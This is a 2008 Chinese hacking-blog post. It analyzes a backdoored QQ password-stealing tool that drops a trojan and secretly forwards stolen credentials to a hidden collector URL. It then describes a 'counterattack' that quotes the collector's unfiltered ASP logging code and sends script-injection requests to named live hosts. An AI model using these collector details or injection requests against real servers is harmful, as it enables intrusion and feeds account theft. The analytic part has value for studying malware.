Hack俊-引领时尚!本站域名:〈建设中〉_≮灬俊少娱乐空间灬≯的...来源: 发布时间:星期三, 2008年12月10日 浏览:2次 评论:0
QQ盗号软件后门分析与反击 对明小子QQ密码特工软件  分析 ----小财 今天无聊给  朋友讲解QQ盗取原理 从网上找了个工具 “明小子QQ密码特工”结果发现这个软件有后门 下面就让我带着大家来分析下 首先我们用nod32来查 下有没有毒图1  看到了吧没有病毒 我们把监控打开在运行看看图2  看到了吧 NOD32检测到了病毒 为了确认下我再用‘木马辅助查找器’文件监视功能来检测下 图3  新建 C:\Documents and Settings\Administrator\Local Settings\Temp\IXP003.TMP\123.exe 很明显软件本身在运行 同时释放了个123.exe 而NOD32查杀到也就是这个文件 C:\Documents and Settings\Administrator\Local Settings\Temp\IXP003.TMP\ 接着我们用peid查下123.exe. 图4  EP段.nsp1经常搞免杀 应该知道这是北斗加壳我们再看看区段vmp 图5  这个 看就是用vmprotect做免杀至于123.exe是什么木马咱门就不继续分析了 接下来分析他生成后 文件是不是样令人担忧 随便配置 个图6  Ollydbg手工给他脱壳esp定律简单 图7  脱壳成功后我们在用PEID检测下 图8  我们再用c32asm对他进行反汇编 搜索asp图9  看到了什么 .刚才我是默认设置 应该是http://k.thec.cn/xieming/69q/qq.asp才对怎么会是http://langyeqq.cn/qq/ backa.asp 这个呢!我们浏览看看 图10  "pzQQ"看到了吧 说明就是他盗号从这些可以确定这个软件不但运行时候施放个木马而且就连我们配置好文件也被他留了后门而作者就坐等着收号了 后门反击战 作者:fhod 看到这..想必大家也和我 样非常气愤..难道我们就任由作者下去吗.当然不..现在我们就开始反击. 我们来看看qq.asp 代码 首先来看 strLogFile="Q7.txt" 这个是QQ接受文件..默认 是q7.txt 继续看代码 QQNumber=request("QQNumber") QQPassWord=request("QQPassWord") QQclub=request("QQclub") QQip=request("QQip") 是没经过任何过滤 ..这些参数数据我们完全可以自定义 在往下看  QQNumber="" or QQPassWord="" then response.write "pzQQ" response.end 假如QQNumber和QQPassWord 值为空就返回pzQQ .然后 结束工作.. 只要这两个值不为空就继续执行下面代码 StrLogText =StrLogText&QQNumber&"----"&QQPassWord&"----会员:"& QQclub&"----IP:"&QQip&"("&request.servervariables("REMOTE_HOST") StrLogText=StrLogText&")" 写入q7.txt文件 格式为 QQ号码----QQ密码----会员:----IP: 继续看下面 代码  f=Server.CreateObject("scripting.filesystemobject") (没有q7.txt这个文件就自动新建) ff=f.opentextfile(server.mappath(".")&"\"&strLogFile,8,true,0) ff.writeline(StrLogText) (打开q7.txt并写入数据) 最后response.write "发送成功!" 满足条件提示成功. 所有 代码也就是这些..并未做任何过滤..和处理..也就是说..只要满足qq.asp?QQNumber=123&QQPassWord=123 就回返回 "发送成功!"提示. http://www.ciker.org/soft/qq.asp?QQNumber=123&QQPassWord=123 图11  这就证明了QQNumber=123&QQPassWord=123这两个我们是可以自己定义 ..如果我们写入不是数字..而且段脚本代码呢?会不会执行呢..让我们来试下 http://www.ciker.org/soft/qq.asp?QQNumber=123&QQPassWord=< ... quot;fhod")</script> 图12  插入代码成功...我们来看下 http://www.ciker.org/soft/q7.txt 源文件又是什么样.. [ 0
相关文章读者评论
发表评论 |
 |
专注于互联网--专注于架构 |
最新标签 网站地图 文章索引 Rss订阅 |
